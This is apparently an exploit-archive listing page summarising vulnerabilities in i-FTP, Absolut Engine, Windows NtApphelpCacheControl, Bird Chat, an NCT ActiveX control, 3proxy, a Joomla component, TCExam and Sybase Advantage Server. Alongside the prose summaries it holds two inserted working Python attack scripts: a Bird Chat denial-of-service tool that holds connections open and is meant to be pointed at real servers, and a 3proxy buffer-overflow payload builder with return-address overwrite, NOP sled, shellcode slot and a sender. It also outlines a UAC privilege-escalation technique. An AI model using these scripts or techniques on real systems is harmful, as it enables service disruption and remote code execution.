Explore all Exploits:

i-FTP Schedule Buffer Overflow

This module exploits a stack-based buffer overflow in i-Ftp v2.20 caused by an overly long time value in a scheduled download entry. By persuading the victim to place a specially crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or crash the application. This module has been tested successfully on Windows XP SP3.

Advisory: Multiple SQL Injections and Reflected XSS in Absolut Engine v.1.73 CMS

The (no longer actively developed) CMS Absolut Engine v. 1.73 has multiple SQL injection vulnerabilities and an XSS vulnerability in its administrative backend. The following PHP scripts are prone to SQL injection: managersection.php (via the sectionID parameter), edituser.php (via the userID parameter), admin.php (via the username parameter, blind SQL injection), and managerrelated.php (via the title parameter). The following PHP script is prone to XSS: managerrelated.php (via the title parameter).

NtApphelpCacheControl Vulnerability

On Windows 8.1 Update the system call NtApphelpCacheControl (the code is actually in ahcache.sys) allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries, as that operation is restricted to administrators; the check is made in the function AhcVerifyAdminContext. This function has a vulnerability: it doesn't correctly check the impersonation token of the caller when determining whether the user is an administrator. It reads the caller's impersonation token using PsReferenceImpersonationToken and then compares the user SID in the token against LocalSystem's SID. It never checks the impersonation level of the token, so it is possible to get an identification-level token from a local system process onto your thread and bypass the check (an identification-level token only lets a server learn who the client is, not act as it, which is exactly why a privilege check must also require SecurityImpersonation or higher). For this purpose the PoC abuses the BITS service and COM to obtain the impersonation token, but there are probably other ways. It is then just a case of finding a way to exploit the vulnerability. In the PoC a cache entry is made for a UAC auto-elevate executable (say ComputerDefaults.exe) and the cache is set up to point to the app compat entry for regsvr32, which forces a RedirectExe shim to reload regsvr32.exe. However, any executable could be used; the trick would be finding a suitable pre-existing app compat configuration to abuse.

Bird Chat 1.61 – Denial Of Service – Proof Of Concept

This proof of concept code exploits a denial of service vulnerability in Bird Chat 1.61. The code attempts to establish multiple connections to the target server, sending a fake user name on each connection. If the server is vulnerable, it will not respond on the connection and the read will time out. If the server is not vulnerable, it will respond with a '?' character.
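A probe built on the rule given above, as an added example that is not the original PoC. The reply rule ('?' means not vulnerable, silence until the timeout means vulnerable) is the one the page states; the wire format of the fake user name (a single line) is an assumption, and the fake_server helper is a constructed stand-in so the script runs offline. Probed sockets are deliberately kept open, since the denial of service only builds if the connections accumulate on the server.

```python
"""Bird Chat 1.61 DoS probe (added example, not the original PoC code)."""
import socket
import threading

NOT_VULNERABLE_REPLY = b"?"
FAKE_USER = b"fakeuser\r\n"   # assumption: the login is a single user-name line


def interpret_reply(reply):
    """Verdict per the advisory: no bytes before the timeout means the server is
    vulnerable; a '?' means it is still answering connections normally."""
    if reply is None:
        return "vulnerable"
    if reply.startswith(NOT_VULNERABLE_REPLY):
        return "not vulnerable"
    return "inconclusive"          # e.g. b"" when the server closed the connection


def probe(target, port, timeout=2.0):
    """Open one connection, send the fake user name and wait for a reply.
    The socket is returned, not closed, so the connection stays open and the
    load on the server accumulates across probes."""
    s = socket.create_connection((target, port), timeout=timeout)
    s.sendall(FAKE_USER)
    try:
        reply = s.recv(16)
    except socket.timeout:
        reply = None
    return s, reply


def run(target, port, connections=50, timeout=2.0):
    """Repeat the probe; returns the held sockets and one verdict per probe."""
    held, verdicts = [], []
    for _ in range(connections):
        s, reply = probe(target, port, timeout=timeout)
        held.append(s)
        verdicts.append(interpret_reply(reply))
    return held, verdicts


def fake_server(respond):
    """Constructed stand-in for offline testing: a listener on 127.0.0.1 that
    either answers every client with '?' or accepts and stays silent.
    Returns the ephemeral port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(64)
    clients = []                  # keep accepted sockets open, like a stalled server

    def serve():
        while True:
            try:
                c, _ = srv.accept()
            except OSError:
                return
            clients.append(c)
            if respond:
                c.sendall(NOT_VULNERABLE_REPLY)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    port = fake_server(respond=False)          # silent server: every probe times out
    _, verdicts = run("127.0.0.1", port, connections=3, timeout=0.5)
    print(verdicts)
```

Against a real target, call run() with the chat server's host and port; a short timeout keeps the probe loop fast, but set it above the server's normal response latency or a slow but healthy server will be misreported as vulnerable.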

NCTAudioEditor2 ActiveX DLL (NCTWMAFile2.dll v. 2.6.2.157) "CreateFile()" Insecure Method

This exploit uses the control's CreateFile() method, reachable from a web page in Internet Explorer, to overwrite the system.ini file, which can leave the system unable to restart. It affects all software that uses the NCTWMAFile2.dll v. 2.6.2.157 ActiveX DLL, such as Sienzo DMM. It was tested on Windows XP Professional SP2 with Internet Explorer 7.

3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit

The vulnerability is a fairly trivial buffer overflow in the log_request() function of proxy.c. The exploit sends a GET request containing a large amount of filler data, followed by the address of a `call esp` instruction (used as the overwritten return address), a series of NOP instructions, and the shellcode. The Host: field must be exactly 999 bytes long for the exploit to work.
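A builder for the request layout described above, as an added example rather than the original exploit code. The 999-byte Host: length is from the page; the filler length (the distance to the saved return address), the `call esp` address (0x41424344 is a placeholder) and the INT3 stand-in shellcode are assumptions, and the byte blacklist assumes the proxy handles the header as a C string terminated by CRLF.

```python
"""3proxy v0.5.3g log_request() overflow request builder (added example)."""
import socket
import struct

HOST_FIELD_LEN = 999   # per the advisory: the Host: value must be exactly 999 bytes
NOP = b"\x90"          # x86 NOP; the sled lands execution on the shellcode
# Assumption: NUL or CRLF inside the value would cut the header short before
# log_request() copies it, so they may not appear anywhere in the payload.
BAD_CHARS = b"\x00\r\n"

# Constructed stand-in for shellcode: INT3 breakpoints, so a debugger attached
# to 3proxy shows control flow reaching the sled. Replace with a real payload.
SAMPLE_SHELLCODE = b"\xcc" * 16


def build_host_value(filler_len, call_esp_addr, shellcode):
    """Layout: filler | address of a `call esp` gadget (overwrites the saved
    return address) | NOP sled | shellcode, padded so the value is exactly
    999 bytes. filler_len is not given on the page; find it with a cyclic
    pattern in a debugger."""
    ret = struct.pack("<I", call_esp_addr)           # little-endian 32-bit address
    nop_len = HOST_FIELD_LEN - filler_len - len(ret) - len(shellcode)
    if nop_len < 0:
        raise ValueError("filler + return address + shellcode exceed 999 bytes")
    value = b"A" * filler_len + ret + NOP * nop_len + shellcode
    bad = [hex(b) for b in BAD_CHARS if b in value]
    if bad:
        raise ValueError(f"payload contains header-terminating bytes: {bad}")
    assert len(value) == HOST_FIELD_LEN
    return value


def build_request(host_value, path=b"/"):
    """Wrap the value in the GET request that log_request() will process."""
    return b"GET " + path + b" HTTP/1.0\r\nHost: " + host_value + b"\r\n\r\n"


def send_request(target, port, request, timeout=5.0):
    """Deliver the request to the proxy (3proxy's default HTTP port is 3128)."""
    with socket.create_connection((target, port), timeout=timeout) as s:
        s.sendall(request)


if __name__ == "__main__":
    payload = build_host_value(filler_len=800, call_esp_addr=0x41424344,
                               shellcode=SAMPLE_SHELLCODE)
    print(build_request(payload)[:64])
```

The bad-character check is the part worth keeping even when the offsets change: a `call esp` address containing 0x0a, 0x0d or 0x00 is unusable in this header, so pick a gadget whose bytes pass the check before spending time on the rest.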

com_hospital Component for Joomla! SQL Injection Vulnerability

The 'com_hospital' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TCExam Multiple Cross-Site Scripting Vulnerabilities

TCExam is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Sybase Advantage Server Off-By-One Buffer-Overflow Vulnerability

Sybase Advantage Server is prone to an off-by-one buffer-overflow vulnerability. Attackers may exploit this issue to execute arbitrary code within the context of the affected application; failed exploit attempts may result in a denial-of-service condition. The problem is rather unusual and lies in the code that handles a certain type of packet on the server's UDP port. In short, the server does the following: it uses memcpy to copy the data from the packet into a stack buffer of 0x400 bytes, it uses strlen to calculate the length of that data, and it uses memcpy again to copy the data into a second stack buffer of 0x400 bytes. The problem is that the second memcpy is not limited to the length calculated by strlen, which overflows the second buffer by one byte (the last one) when the data fills the whole 0x400-byte buffer. The overflow can be triggered by sending a packet of 0x400 bytes or more to the server's UDP port.
